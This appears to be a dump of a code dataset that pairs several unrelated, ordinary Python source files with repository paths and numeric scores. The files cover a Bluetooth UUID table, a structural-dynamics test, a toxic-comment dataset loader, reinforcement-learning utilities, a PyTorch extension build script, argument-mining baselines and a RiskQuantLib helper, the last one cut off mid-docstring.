"e95d9882-251d-470a-a062-fa1922dfa9a8": "MicroBit Button Service",
"e95dda90-251d-470a-a062-fa1922dfa9a8": "MicroBit Button A State",
"e95dda91-251d-470a-a062-fa1922dfa9a8": "MicroBit Button B State",
"e95d127b-251d-470a-a062-fa1922dfa9a8": "MicroBit IO PIN Service",
"e95d8d00-251d-470a-a062-fa1922dfa9a8": "MicroBit PIN Data",
"e95d5899-251d-470a-a062-fa1922dfa9a8": "MicroBit PIN AD Configuration",
"e95dd822-251d-470a-a062-fa1922dfa9a8": "MicroBit PWM Control",
"e95dd91d-251d-470a-a062-fa1922dfa9a8": "MicroBit LED Service",
"e95d7b77-251d-470a-a062-fa1922dfa9a8": "MicroBit LED Matrix state",
"e95d93ee-251d-470a-a062-fa1922dfa9a8": "MicroBit LED Text",
"e95d0d2d-251d-470a-a062-fa1922dfa9a8": "MicroBit Scrolling Delay",
"e95d93af-251d-470a-a062-fa1922dfa9a8": "MicroBit Event Service",
"e95db84c-251d-470a-a062-fa1922dfa9a8": "MicroBit Requirements",
"e95d9775-251d-470a-a062-fa1922dfa9a8": "MicroBit Event Data",
"e95d23c4-251d-470a-a062-fa1922dfa9a8": "MicroBit Client Requirements",
"e95d5404-251d-470a-a062-fa1922dfa9a8": "MicroBit Client Events",
"e95d93b0-251d-470a-a062-fa1922dfa9a8": "MicroBit DFU Control Service" "",
"e95d93b1-251d-470a-a062-fa1922dfa9a8": "MicroBit DFU Control",
"e95d6100-251d-470a-a062-fa1922dfa9a8": "MicroBit Temperature Service",
"e95d1b25-251d-470a-a062-fa1922dfa9a8": "MicroBit Temperature Period",
# Nordic UART Port Emulation */
"6e400001-b5a3-f393-e0a9-e50e24dcca9e": "Nordic UART Service",
"6e400002-b5a3-f393-e0a9-e50e24dcca9e": "Nordic UART TX",
"6e400003-b5a3-f393-e0a9-e50e24dcca9e": "Nordic UART RX",
}
def uuidstr_to_str(uuid_):
s = uuid128_dict.get(uuid_)
if s:
return s
if not s and uuid_.endswith("-0000-1000-8000-00805f9b34fb"):
s = "Vendor specific"
v = int(uuid_[:8], 16)
if (v & 0xffff0000) == 0x0000:
s = uuid16_dict.get(v & 0x0000ffff, s)
if not s:
return "Unknown"
return s | 0.597843 | 0.46035 |
import unittest
import os
import numpy as np
from welib.yams.sid import FAST2SID
MyDir=os.path.dirname(__file__)
# --------------------------------------------------------------------------------}
# --- TESTS
# --------------------------------------------------------------------------------{
class Test(unittest.TestCase):
def test_fast2sid_twr(self):
np.set_printoptions(linewidth=300, precision=9)
# --- Read data from NREL5MW tower
EDFile=os.path.join(MyDir,'./../../../data/NREL5MW/data/NREL5MW_ED_Onshore.dat')
sid, _ = FAST2SID(EDFile, Imodes_twr=[(0,1)])
# --- Generalized mass matrix
np.testing.assert_almost_equal(np.diag(sid.Mtt), [347460.2316]*3, 5)
np.testing.assert_almost_equal(np.diag(sid.J.M0)/1e8, np.array([7.198598843e8]*2+[3.474602316e5])/1e8, 5)
np.testing.assert_almost_equal(np.diag(sid.Me.M0), [61094.66490]*2, 5)
# np.testing.assert_almost_equal(freq[0], 0.891449, 5)
# np.testing.assert_almost_equal(freq[1], 0.891449, 5)
# np.testing.assert_almost_equal(freq[-1], 5250.756553, 5)
#
np.testing.assert_almost_equal(sid.Mrt[0,1], -13265404.838207997, 5) # -m*zCOG
np.testing.assert_almost_equal(sid.Mgt[0,0], 104625.69072, 5) # -m*zCOG
np.testing.assert_almost_equal(sid.Mgt[1,1], 104625.69072, 5) # -m*zCOG
np.testing.assert_almost_equal(sid.Mgr[0,1], 6449889.716099, 5) # -m*zCOG
np.testing.assert_almost_equal(sid.Mgr[1,0],-6449889.716099, 5) # -m*zCOG
#
# --- C3 mass matrix 3 3 12 12 ie
np.testing.assert_almost_equal(sid.C3[0, 0, 0, 0, 0], 16063.6792 , 5) # -m*zCOG
np.testing.assert_almost_equal(sid.C3[0, 0, 0, 6, 0], 7901.009 , 5) # -m*zCOG
np.testing.assert_almost_equal(sid.C3[1, 1, 1, 1, 0], 17921.95635, 5) # -m*zCOG
np.testing.assert_almost_equal(sid.C3[1, 1, 5, 1, 0], 22014.56673, 5) # -m*zCOG
np.testing.assert_almost_equal(sid.C3[2, 2, 2, 2, 0], 17921.95635, 5) # -m*zCOG
np.testing.assert_almost_equal(sid.C3[2, 2,10,10, 0], 34359.12315, 5) # -m*zCOG
# --- Term for second order Cr (Mgr) terms and Oe
np.testing.assert_almost_equal(sid.Kr[2,0,1], -61094.66491, 5)
np.testing.assert_almost_equal(sid.Kr[2,1,0], 61094.66491, 5)
# --- Terms useful for 0th order of Gr, and 1st order of J
np.testing.assert_almost_equal(sid.C4[0,2,0], 6449889.7161, 4)
np.testing.assert_almost_equal(sid.C4[1,2,1], 6449889.7161, 4)
# --- Omega terms
np.testing.assert_almost_equal(sid.Kom[0][1,1], -61094.664906, 5)
np.testing.assert_almost_equal(sid.Kom[1][0,0], -61094.664906, 5)
np.testing.assert_almost_equal(sid.Kom[2][0,0], -61094.664906, 5)
np.testing.assert_almost_equal(sid.Kom[3][0,1], 61094.664906, 5)
np.testing.assert_almost_equal(sid.Kom[4][0,0], 0, 5)
np.testing.assert_almost_equal(sid.Kom[5][0,0], 0, 5)
np.testing.assert_almost_equal(sid.GKg['omxx'][0,0], 77201.43393, 5)
np.testing.assert_almost_equal(sid.GKg['omyy'][0,0], 77201.43393, 5)
np.testing.assert_almost_equal(sid.GKg['omzz'][0,0], 0, 5)
np.testing.assert_almost_equal(sid.GKg['omyz'][0,0], 0, 5)
#print(sid)
with open('_OUT_SID_TWR_PY.txt','w') as f:
f.write(str(sid).replace('-0.000000',' 0.000000'))
def test_fast2sid_bld(self):
np.set_printoptions(linewidth=300, precision=9)
# --- Read data from NREL5MW tower
EDFile=os.path.join(MyDir,'./../../../data/NREL5MW/data/NREL5MW_ED_Onshore.dat')
_, sid = FAST2SID(EDFile, Imodes_bld=[0,1])
with open('_OUT_SID_BLD_PY.txt','w') as f:
f.write(str(sid).replace('-0.000000',' 0.000000'))
if __name__=='__main__':
Test().test_fast2sid_bld()
# unittest.main() | welib/yams/tests/test_sid.py | import unittest
import os
import numpy as np
from welib.yams.sid import FAST2SID
MyDir=os.path.dirname(__file__)
# --------------------------------------------------------------------------------}
# --- TESTS
# --------------------------------------------------------------------------------{
class Test(unittest.TestCase):
def test_fast2sid_twr(self):
np.set_printoptions(linewidth=300, precision=9)
# --- Read data from NREL5MW tower
EDFile=os.path.join(MyDir,'./../../../data/NREL5MW/data/NREL5MW_ED_Onshore.dat')
sid, _ = FAST2SID(EDFile, Imodes_twr=[(0,1)])
# --- Generalized mass matrix
np.testing.assert_almost_equal(np.diag(sid.Mtt), [347460.2316]*3, 5)
np.testing.assert_almost_equal(np.diag(sid.J.M0)/1e8, np.array([7.198598843e8]*2+[3.474602316e5])/1e8, 5)
np.testing.assert_almost_equal(np.diag(sid.Me.M0), [61094.66490]*2, 5)
# np.testing.assert_almost_equal(freq[0], 0.891449, 5)
# np.testing.assert_almost_equal(freq[1], 0.891449, 5)
# np.testing.assert_almost_equal(freq[-1], 5250.756553, 5)
#
np.testing.assert_almost_equal(sid.Mrt[0,1], -13265404.838207997, 5) # -m*zCOG
np.testing.assert_almost_equal(sid.Mgt[0,0], 104625.69072, 5) # -m*zCOG
np.testing.assert_almost_equal(sid.Mgt[1,1], 104625.69072, 5) # -m*zCOG
np.testing.assert_almost_equal(sid.Mgr[0,1], 6449889.716099, 5) # -m*zCOG
np.testing.assert_almost_equal(sid.Mgr[1,0],-6449889.716099, 5) # -m*zCOG
#
# --- C3 mass matrix 3 3 12 12 ie
np.testing.assert_almost_equal(sid.C3[0, 0, 0, 0, 0], 16063.6792 , 5) # -m*zCOG
np.testing.assert_almost_equal(sid.C3[0, 0, 0, 6, 0], 7901.009 , 5) # -m*zCOG
np.testing.assert_almost_equal(sid.C3[1, 1, 1, 1, 0], 17921.95635, 5) # -m*zCOG
np.testing.assert_almost_equal(sid.C3[1, 1, 5, 1, 0], 22014.56673, 5) # -m*zCOG
np.testing.assert_almost_equal(sid.C3[2, 2, 2, 2, 0], 17921.95635, 5) # -m*zCOG
np.testing.assert_almost_equal(sid.C3[2, 2,10,10, 0], 34359.12315, 5) # -m*zCOG
# --- Term for second order Cr (Mgr) terms and Oe
np.testing.assert_almost_equal(sid.Kr[2,0,1], -61094.66491, 5)
np.testing.assert_almost_equal(sid.Kr[2,1,0], 61094.66491, 5)
# --- Terms useful for 0th order of Gr, and 1st order of J
np.testing.assert_almost_equal(sid.C4[0,2,0], 6449889.7161, 4)
np.testing.assert_almost_equal(sid.C4[1,2,1], 6449889.7161, 4)
# --- Omega terms
np.testing.assert_almost_equal(sid.Kom[0][1,1], -61094.664906, 5)
np.testing.assert_almost_equal(sid.Kom[1][0,0], -61094.664906, 5)
np.testing.assert_almost_equal(sid.Kom[2][0,0], -61094.664906, 5)
np.testing.assert_almost_equal(sid.Kom[3][0,1], 61094.664906, 5)
np.testing.assert_almost_equal(sid.Kom[4][0,0], 0, 5)
np.testing.assert_almost_equal(sid.Kom[5][0,0], 0, 5)
np.testing.assert_almost_equal(sid.GKg['omxx'][0,0], 77201.43393, 5)
np.testing.assert_almost_equal(sid.GKg['omyy'][0,0], 77201.43393, 5)
np.testing.assert_almost_equal(sid.GKg['omzz'][0,0], 0, 5)
np.testing.assert_almost_equal(sid.GKg['omyz'][0,0], 0, 5)
#print(sid)
with open('_OUT_SID_TWR_PY.txt','w') as f:
f.write(str(sid).replace('-0.000000',' 0.000000'))
def test_fast2sid_bld(self):
np.set_printoptions(linewidth=300, precision=9)
# --- Read data from NREL5MW tower
EDFile=os.path.join(MyDir,'./../../../data/NREL5MW/data/NREL5MW_ED_Onshore.dat')
_, sid = FAST2SID(EDFile, Imodes_bld=[0,1])
with open('_OUT_SID_BLD_PY.txt','w') as f:
f.write(str(sid).replace('-0.000000',' 0.000000'))
if __name__=='__main__':
Test().test_fast2sid_bld()
# unittest.main() | 0.248899 | 0.6769 |
from . import dataset
from . import helpers
import os
class Gao2018(dataset.Dataset):
name = "gao2018"
url = "https://github.com/sjtuprog/fox-news-comments/raw/master/full-comments-u.json"
hash = "059152e61f632f1e6671a68214d5618a21e6cf78f2512773e0421b9568aab8cf"
files = [
{
"name": "gao2018en.csv",
"language": "en",
"type": "training",
"platform": "fox news"
}
]
comment = """Inflammatory language explicitly or implicitly threatens or demeans a person or agroup based upon a facet of their identity such as gender, ethnicity, or sexualorientation.
- Excludes insults towards other anonymous users
- Includes insults of belief systems"""
license = """The MIT License
Copyright (c) 2010-2019 Google, Inc. http://angularjs.org
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE."""
@classmethod
def process(cls, tmp_file_path, dataset_folder, api_config):
tmp_file_path = helpers.convert_jsonl_to_csv(tmp_file_path)
helpers.copy_file(tmp_file_path, os.path.join(dataset_folder, "gao2018en.csv"))
@classmethod
def unify_row(cls, row):
labels = []
if row["label"] == 0:
labels.append("normal")
if row["label"] == 1:
labels.append("hate")
row["labels"] = labels
row = row.drop(["title","succ","meta","user","mentions","prev", "label"])
return row | src/toxic_comment_collection/datasets/gao2018.py | from . import dataset
from . import helpers
import os
class Gao2018(dataset.Dataset):
name = "gao2018"
url = "https://github.com/sjtuprog/fox-news-comments/raw/master/full-comments-u.json"
hash = "059152e61f632f1e6671a68214d5618a21e6cf78f2512773e0421b9568aab8cf"
files = [
{
"name": "gao2018en.csv",
"language": "en",
"type": "training",
"platform": "fox news"
}
]
comment = """Inflammatory language explicitly or implicitly threatens or demeans a person or agroup based upon a facet of their identity such as gender, ethnicity, or sexualorientation.
- Excludes insults towards other anonymous users
- Includes insults of belief systems"""
license = """The MIT License
Copyright (c) 2010-2019 Google, Inc. http://angularjs.org
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE."""
@classmethod
def process(cls, tmp_file_path, dataset_folder, api_config):
tmp_file_path = helpers.convert_jsonl_to_csv(tmp_file_path)
helpers.copy_file(tmp_file_path, os.path.join(dataset_folder, "gao2018en.csv"))
@classmethod
def unify_row(cls, row):
labels = []
if row["label"] == 0:
labels.append("normal")
if row["label"] == 1:
labels.append("hate")
row["labels"] = labels
row = row.drop(["title","succ","meta","user","mentions","prev", "label"])
return row | 0.631481 | 0.239327 |
import collections
import logging
import threading
import gym
import numpy as np
logger = logging.getLogger(__name__)
class WorkerTracker:
def __init__(self, global_model, model_path):
self.lock = threading.Lock()
self.global_model = global_model
self.model_path = model_path
self.global_episodes = 0
self.global_best_reward = -np.inf
self.rewards = []
self.losses = []
self.window = 50
def episode_complete(
self, index, steps, reward, loss, policy_loss=None, value_loss=None
):
with self.lock:
self.global_episodes += 1
self.rewards.append(reward)
if policy_loss is not None and value_loss is not None:
loss = [loss, policy_loss, value_loss]
self.losses.append(loss)
logger.debug(
f"Episode: {self.global_episodes}, "
f"Worker: {index}, "
f"Steps: {steps}, "
f"Reward: {np.round(reward, 1)}, "
f"Moving average: {np.round(np.mean(self.rewards[-self.window:]), 1)}, "
f"Loss: {np.round(loss, 1)}, "
f"Moving average: {np.round(np.mean(self.losses[-self.window:]), 1)}"
)
if self.global_model is not None and reward > self.global_best_reward:
logger.info(
f"New best reward: {reward} vs. {self.global_best_reward}, "
f"Saving model to: {self.model_path}"
)
with self.lock:
self.global_model.save_weights(self.model_path)
self.global_best_reward = reward
class WorkerMemory:
def __init__(self):
self.states = []
self.actions = []
self.rewards = []
def append(self, state, action, reward):
self.states.append(state)
self.actions.append(action)
self.rewards.append(reward)
def clear(self):
self.states = []
self.actions = []
self.rewards = []
def parse_env(env):
"""Parse the given environment and return useful information about it,
such as whether it is continuous or not and the size of the action space.
"""
# Determine whether input is continuous or discrete. Generally, for
# discrete actions, we will take the softmax of the output
# probabilities and for the continuous we will use the linear output,
# rescaled to the action space.
action_is_continuous = False
action_low = None
action_high = None
if isinstance(env.action_space, gym.spaces.Discrete):
action_size = env.action_space.n
else:
action_is_continuous = True
action_low = env.action_space.low
action_high = env.action_space.high
action_size = env.action_space.low.shape[0]
return action_is_continuous, action_size, action_low, action_high | rl/agent/util.py | import collections
import logging
import threading
import gym
import numpy as np
logger = logging.getLogger(__name__)
class WorkerTracker:
def __init__(self, global_model, model_path):
self.lock = threading.Lock()
self.global_model = global_model
self.model_path = model_path
self.global_episodes = 0
self.global_best_reward = -np.inf
self.rewards = []
self.losses = []
self.window = 50
def episode_complete(
self, index, steps, reward, loss, policy_loss=None, value_loss=None
):
with self.lock:
self.global_episodes += 1
self.rewards.append(reward)
if policy_loss is not None and value_loss is not None:
loss = [loss, policy_loss, value_loss]
self.losses.append(loss)
logger.debug(
f"Episode: {self.global_episodes}, "
f"Worker: {index}, "
f"Steps: {steps}, "
f"Reward: {np.round(reward, 1)}, "
f"Moving average: {np.round(np.mean(self.rewards[-self.window:]), 1)}, "
f"Loss: {np.round(loss, 1)}, "
f"Moving average: {np.round(np.mean(self.losses[-self.window:]), 1)}"
)
if self.global_model is not None and reward > self.global_best_reward:
logger.info(
f"New best reward: {reward} vs. {self.global_best_reward}, "
f"Saving model to: {self.model_path}"
)
with self.lock:
self.global_model.save_weights(self.model_path)
self.global_best_reward = reward
class WorkerMemory:
def __init__(self):
self.states = []
self.actions = []
self.rewards = []
def append(self, state, action, reward):
self.states.append(state)
self.actions.append(action)
self.rewards.append(reward)
def clear(self):
self.states = []
self.actions = []
self.rewards = []
def parse_env(env):
"""Parse the given environment and return useful information about it,
such as whether it is continuous or not and the size of the action space.
"""
# Determine whether input is continuous or discrete. Generally, for
# discrete actions, we will take the softmax of the output
# probabilities and for the continuous we will use the linear output,
# rescaled to the action space.
action_is_continuous = False
action_low = None
action_high = None
if isinstance(env.action_space, gym.spaces.Discrete):
action_size = env.action_space.n
else:
action_is_continuous = True
action_low = env.action_space.low
action_high = env.action_space.high
action_size = env.action_space.low.shape[0]
return action_is_continuous, action_size, action_low, action_high | 0.776792 | 0.225331 |
import sys
import torch.cuda
import os
from setuptools import setup
from torch.utils.cpp_extension import BuildExtension, CppExtension, CUDAExtension
from torch.utils.cpp_extension import CUDA_HOME, ROCM_HOME
if sys.platform == 'win32':
vc_version = os.getenv('VCToolsVersion', '')
if vc_version.startswith('14.16.'):
CXX_FLAGS = ['/sdl']
else:
CXX_FLAGS = ['/sdl', '/permissive-']
else:
CXX_FLAGS = ['-g']
USE_NINJA = os.getenv('USE_NINJA') == '1'
ext_modules = [
CppExtension(
'torch_test_cpp_extension.cpp', ['extension.cpp'],
extra_compile_args=CXX_FLAGS),
CppExtension(
'torch_test_cpp_extension.msnpu', ['msnpu_extension.cpp'],
extra_compile_args=CXX_FLAGS),
CppExtension(
'torch_test_cpp_extension.rng', ['rng_extension.cpp'],
extra_compile_args=CXX_FLAGS),
]
if torch.cuda.is_available() and CUDA_HOME is not None:
extension = CUDAExtension(
'torch_test_cpp_extension.cuda', [
'cuda_extension.cpp',
'cuda_extension_kernel.cu',
'cuda_extension_kernel2.cu',
],
extra_compile_args={'cxx': CXX_FLAGS,
'nvcc': ['-O2']})
ext_modules.append(extension)
elif torch.cuda.is_available() and ROCM_HOME is not None:
from torch.utils.hipify import hipify_python
this_dir = os.path.dirname(os.path.abspath(__file__))
hipify_python.hipify(
project_directory=this_dir,
output_directory=this_dir,
includes="./*",
show_detailed=True,
is_pytorch_extension=True,)
extension = CUDAExtension(
'torch_test_cpp_extension.cuda', [
'cuda_extension.cpp',
'hip/hip_extension_kernel.hip',
'hip/hip_extension_kernel2.hip',
])
ext_modules.append(extension)
setup(
name='torch_test_cpp_extension',
packages=['torch_test_cpp_extension'],
ext_modules=ext_modules,
include_dirs='self_compiler_include_dirs_test',
cmdclass={'build_ext': BuildExtension.with_options(use_ninja=USE_NINJA)}) | test/cpp_extensions/setup.py | import sys
import torch.cuda
import os
from setuptools import setup
from torch.utils.cpp_extension import BuildExtension, CppExtension, CUDAExtension
from torch.utils.cpp_extension import CUDA_HOME, ROCM_HOME
if sys.platform == 'win32':
vc_version = os.getenv('VCToolsVersion', '')
if vc_version.startswith('14.16.'):
CXX_FLAGS = ['/sdl']
else:
CXX_FLAGS = ['/sdl', '/permissive-']
else:
CXX_FLAGS = ['-g']
USE_NINJA = os.getenv('USE_NINJA') == '1'
ext_modules = [
CppExtension(
'torch_test_cpp_extension.cpp', ['extension.cpp'],
extra_compile_args=CXX_FLAGS),
CppExtension(
'torch_test_cpp_extension.msnpu', ['msnpu_extension.cpp'],
extra_compile_args=CXX_FLAGS),
CppExtension(
'torch_test_cpp_extension.rng', ['rng_extension.cpp'],
extra_compile_args=CXX_FLAGS),
]
if torch.cuda.is_available() and CUDA_HOME is not None:
extension = CUDAExtension(
'torch_test_cpp_extension.cuda', [
'cuda_extension.cpp',
'cuda_extension_kernel.cu',
'cuda_extension_kernel2.cu',
],
extra_compile_args={'cxx': CXX_FLAGS,
'nvcc': ['-O2']})
ext_modules.append(extension)
elif torch.cuda.is_available() and ROCM_HOME is not None:
from torch.utils.hipify import hipify_python
this_dir = os.path.dirname(os.path.abspath(__file__))
hipify_python.hipify(
project_directory=this_dir,
output_directory=this_dir,
includes="./*",
show_detailed=True,
is_pytorch_extension=True,)
extension = CUDAExtension(
'torch_test_cpp_extension.cuda', [
'cuda_extension.cpp',
'hip/hip_extension_kernel.hip',
'hip/hip_extension_kernel2.hip',
])
ext_modules.append(extension)
setup(
name='torch_test_cpp_extension',
packages=['torch_test_cpp_extension'],
ext_modules=ext_modules,
include_dirs='self_compiler_include_dirs_test',
cmdclass={'build_ext': BuildExtension.with_options(use_ninja=USE_NINJA)}) | 0.263126 | 0.083703 |
# Author: <NAME> <<EMAIL>>
# License: BSD 3-clause
import os
import numpy as np
from sklearn.metrics import precision_recall_fscore_support
from marseille.io import load_csr
from marseille.custom_logging import logging
def main():
from docopt import docopt
usage = """
Usage:
baselines (cdcp|ukp) [--n-folds=N]
Options:
--n-folds=N number of cross-val folds to generate. [default: 3]
"""
args = docopt(usage)
n_folds = int(args['--n-folds'])
all_true = []
all_false = []
adjacent = []
adjacent_ltr = []
adjacent_rtl = []
if args['cdcp']:
path = os.path.join("data", "process", "erule", "folds", "{}", "{}")
elif args['ukp']:
path = os.path.join("data", "process", "ukp-essays", "folds", "{}",
"{}")
for k in range(n_folds):
fname = path.format(k, 'val.npz')
logging.info("Loading sparse vectorized file {}".format(fname))
X_te, y_te = load_csr(fname, return_y=True)
with open(path.format(k, "fnames.txt")) as f:
fnames = [line.strip() for line in f]
props_between = fnames.index('nrm__props_between')
src_precedes_trg = fnames.index('raw__src_precedes_trg')
trg_precedes_src = fnames.index('raw__trg_precedes_src')
y_all_true = np.ones_like(y_te)
y_all_false = np.zeros_like(y_te)
y_adj = ~(X_te[:, props_between] != 0).A.ravel()
is_src_first = X_te[:, src_precedes_trg].astype(np.bool).A.ravel()
is_trg_first = X_te[:, trg_precedes_src].astype(np.bool).A.ravel()
y_adj_ltr = y_adj & is_src_first
y_adj_rtl = y_adj & is_trg_first
def _score(y):
p, r, f, _ = precision_recall_fscore_support(y_te, y, pos_label=1,
average='binary')
return p, r, f
all_true.append(_score(y_all_true))
all_false.append(_score(y_all_false))
adjacent.append(_score(y_adj))
adjacent_ltr.append(_score(y_adj_ltr))
adjacent_rtl.append(_score(y_adj_rtl))
preds = (all_false, all_true, adjacent, adjacent_ltr, adjacent_rtl)
preds = [np.array(x).mean(axis=0) for x in preds]
names = ["All false", "All true", "Adjacent", "Adj s -> t", "Adj t <- s"]
for name, scores in zip(names, preds):
print("{:18} {:.4f} {:.4f} {:.4f}".format(name, *scores))
if __name__ == '__main__':
main() | marseille/dummy_baselines.py |
# Author: <NAME> <<EMAIL>>
# License: BSD 3-clause
import os
import numpy as np
from sklearn.metrics import precision_recall_fscore_support
from marseille.io import load_csr
from marseille.custom_logging import logging
def main():
from docopt import docopt
usage = """
Usage:
baselines (cdcp|ukp) [--n-folds=N]
Options:
--n-folds=N number of cross-val folds to generate. [default: 3]
"""
args = docopt(usage)
n_folds = int(args['--n-folds'])
all_true = []
all_false = []
adjacent = []
adjacent_ltr = []
adjacent_rtl = []
if args['cdcp']:
path = os.path.join("data", "process", "erule", "folds", "{}", "{}")
elif args['ukp']:
path = os.path.join("data", "process", "ukp-essays", "folds", "{}",
"{}")
for k in range(n_folds):
fname = path.format(k, 'val.npz')
logging.info("Loading sparse vectorized file {}".format(fname))
X_te, y_te = load_csr(fname, return_y=True)
with open(path.format(k, "fnames.txt")) as f:
fnames = [line.strip() for line in f]
props_between = fnames.index('nrm__props_between')
src_precedes_trg = fnames.index('raw__src_precedes_trg')
trg_precedes_src = fnames.index('raw__trg_precedes_src')
y_all_true = np.ones_like(y_te)
y_all_false = np.zeros_like(y_te)
y_adj = ~(X_te[:, props_between] != 0).A.ravel()
is_src_first = X_te[:, src_precedes_trg].astype(np.bool).A.ravel()
is_trg_first = X_te[:, trg_precedes_src].astype(np.bool).A.ravel()
y_adj_ltr = y_adj & is_src_first
y_adj_rtl = y_adj & is_trg_first
def _score(y):
p, r, f, _ = precision_recall_fscore_support(y_te, y, pos_label=1,
average='binary')
return p, r, f
all_true.append(_score(y_all_true))
all_false.append(_score(y_all_false))
adjacent.append(_score(y_adj))
adjacent_ltr.append(_score(y_adj_ltr))
adjacent_rtl.append(_score(y_adj_rtl))
preds = (all_false, all_true, adjacent, adjacent_ltr, adjacent_rtl)
preds = [np.array(x).mean(axis=0) for x in preds]
names = ["All false", "All true", "Adjacent", "Adj s -> t", "Adj t <- s"]
for name, scores in zip(names, preds):
print("{:18} {:.4f} {:.4f} {:.4f}".format(name, *scores))
if __name__ == '__main__':
main() | 0.645343 | 0.184602 |
import sys,os,importlib
from RiskQuantLib.Tool.codeBuilderTool import pythonScriptBuilder
def convertPathToImportPath(pathString:str):
"""
convertPathToImportPath(pathString:str) is a function to convert file path to class import path.
Parameters
----------
pathString : str
The relative path of RiskQuantLib files. This path must be relative to RiskQuantLib.__init__.py
Returns
-------
classImportPath : str
The import path of RiskQuantLib files.
"""
listPathDict = pathString.split(os.sep)
className = listPathDict[-1].split('.py')[0]
classImportPath = 'RiskQuantLib.'+"".join([i+'.' for i in listPathDict[1:-1]])+className
return classImportPath
def clearShortcut(targetProjectPath:str=''):
"""
clearShortcut(targetProjectPath:str='') is a function to clear all registration of class paths.
To simplify usage of class, a shortcut will be inserted to RiskQuantLib.module for every auto-built instrument class.
After calling this function, these shortcuts will be removed, but the original source files still exist.
Parameters
----------
targetProjectPath :str
The RiskQuantLib project path where you want to remove all instrument class shortcuts.
Returns
-------
None
"""
projectPath = os.path.abspath(__file__).split('RiskQuantLib'+os.sep+'Build'+os.sep+'buildShortcut.py')[0]
if targetProjectPath == '':
path = projectPath + os.sep + 'RiskQuantLib' + os.sep + 'Module.py'
else:
path = targetProjectPath + os.sep + 'RiskQuantLib' + os.sep + 'Module.py'
# write shortcut path
with open(path, 'r') as f:
content = f.read()
if content.find('#-<moduleImportBegin>') == -1 or content.find('#-<moduleImportEnd>') == -1:
print("Source file must have a #-<Begin> and #-<End> tag to be built")
exit(-1)
former = content.split('#-<moduleImportBegin>')[0]
ender = content.split('#-<moduleImportEnd>')[-1]
newContent = former + '#-<moduleImportBegin>\n#-<moduleImportEnd>' + ender
with open(path, 'w') as f:
f.truncate() # clear all contents
f.write(newContent.strip(' ').strip('\t\n'))
def commitShortcut(psb:pythonScriptBuilder,targetProjectPath:str):
"""
commitShortcut(psb:pythonScriptBuilder,targetProjectPath:str) is a function to commit the change
of shortcut files. It makes modification to RiskQuantLib.module.
Parameters
----------
psb : pythonScriptBuilder
A pythonScriptBuilder object, contains the source code of shortcuts map relation.
targetProjectPath : str
The RiskQuantLib project path where you want to commit shortcut change.
Returns
-------
None
"""
projectPath = os.path.abspath(__file__).split('RiskQuantLib'+os.sep+'Build'+os.sep+'buildShortcut.py')[0]
if targetProjectPath == '':
path = projectPath + os.sep + 'RiskQuantLib' + os.sep + 'Module.py'
else:
path = targetProjectPath + os.sep + 'RiskQuantLib' + os.sep + 'Module.py'
# write shortcut path
with open(path, 'r') as f:
content = f.read()
if content.find('#-<moduleImportBegin>') == -1 or content.find('#-<moduleImportEnd>') == -1:
print("Source file must have a #-<Begin> and #-<End> tag to be built")
exit(-1)
former = content.split('#-<moduleImportBegin>')[0]
ender = content.split('#-<moduleImportEnd>')[-1]
newContent = former + '#-<moduleImportBegin>\n'+psb.importLibrary+'#-<moduleImportEnd>' + ender
with open(path, 'w') as f:
f.truncate() # clear all contents
f.write(newContent.strip(' ').strip('\t\n'))
def buildShortcut(instrumentNameList:list):
"""
buildShortcut(instrumentNameList:list) is the function to generate source code of shortcut map.
It joins class name to class import path, making it easy to use instrument class.
Parameters
----------
instrumentNameList : list
The instruments whose shortcut you want to add to RiskQuantLib.module.
Returns
-------
psb : pythonScriptBuilder
A pythonScriptBuilder object contains map relation from instrument name to import path.
"""
c_instrumentNameList = [i[0].capitalize()+i[1:] for i in instrumentNameList]
psb = pythonScriptBuilder()
import RiskQuantLib.Build.pathObj as POJ
importlib.reload(POJ)
RQLpathObj = POJ.pathObj()
pathWaitedToBeAdded = [convertPathToImportPath(RQLpathObj.listPathDict[i]) for i in c_instrumentNameList]
[psb.setImport(classPath,'',True,className+'List,'+className) for classPath,className in zip(pathWaitedToBeAdded,instrumentNameList)]
return psb | RiskQuantLib/Build/buildShortcut.py | import sys,os,importlib
from RiskQuantLib.Tool.codeBuilderTool import pythonScriptBuilder
def convertPathToImportPath(pathString:str):
"""
convertPathToImportPath(pathString:str) is a function to convert file path to class import path.
Parameters
----------
pathString : str
The relative path of RiskQuantLib files. This path must be relative to RiskQuantLib.__init__.py
Returns
-------
classImportPath : str
The import path of RiskQuantLib files.
"""
listPathDict = pathString.split(os.sep)
className = listPathDict[-1].split('.py')[0]
classImportPath = 'RiskQuantLib.'+"".join([i+'.' for i in listPathDict[1:-1]])+className
return classImportPath
def clearShortcut(targetProjectPath:str=''):
"""
